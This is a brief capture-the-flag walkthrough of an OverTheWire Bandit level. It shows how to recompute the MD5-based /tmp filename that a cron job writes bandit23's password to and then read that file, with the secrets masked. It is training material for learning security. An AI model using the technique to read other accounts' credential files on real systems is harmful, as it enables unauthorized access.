We’re looking at another cronjob this time, cronjob_bandit23. We check the file and find that it appears to be copying the contents of the bandit23 password file to /tmp under a filename that’s derived from the MD5 sum of a string that includes the current user’s name. Based on the cronjob config, the job runs as bandit23, so we can figure out the md5 sum by manually running the command in the script and then substituting the bandit23 string in directly.

bandit22@bandit:/etc/cron.d$ vim cronjob_bandit23
bandit22@bandit:/etc/cron.d$ mytarget=$(echo I am user bandit23 | md5sum | cut -d ' ' -f 1)
bandit22@bandit:/etc/cron.d$ echo $mytarget
XXXXXXXXXXXXXXXXXXX
bandit22@bandit:/etc/cron.d$ cat /tmp/XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXX
bandit22@bandit:/etc/cron.d$